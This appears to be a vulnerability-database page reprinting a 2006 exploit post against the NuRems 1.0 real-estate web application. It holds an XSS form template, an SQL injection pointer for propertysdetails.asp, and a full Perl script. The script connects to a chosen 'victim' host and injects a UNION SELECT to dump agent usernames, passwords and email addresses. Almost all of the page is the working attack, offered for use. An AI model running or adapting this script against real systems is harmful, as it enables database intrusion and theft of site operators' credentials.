Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15024
HistoryNov 14, 2006 - 12:00 a.m.

NuRems 1.0 Remote XSS/SQL Injection Exploit

2006-11-1400:00:00
vulners.com
64
JSON

From:Filistin,Lubnan,IraQ,Turkey
NuRems 1.0 Remote XSS/SQL Injection Exploit

XSS:

<form name=RequestForm action="http://x/sch1.asp&quot; method="POST">
<select name="stcode" size=10>
<option value="XSS HERE">Alabama
</select>
<td align=center>
<INPUT TYPE="submit" VALUE="Show cities…">
</form>

/XSS

SQL: propertysdetails.asp?PropID= SQL

/SQL

#!/usr/bin/perl
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(

use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "propertysdetails.asp?PropID=";
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+*********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed…\n";
print $socket "GET $target\n";
print $socket "Host: $server\n";
print $socket "Accept: /\n";
print $socket "Connection: close\n\n";
print "+ Connected!..\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Location:(.?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /Address:(.*?)<\/font>/){
print "+ Password: $1\n";
}

if ($answer =~ /# Rooms:(.*?)<\/font>/){
print "+ Email: $1\n";
exit();
}

if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}

print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

JSON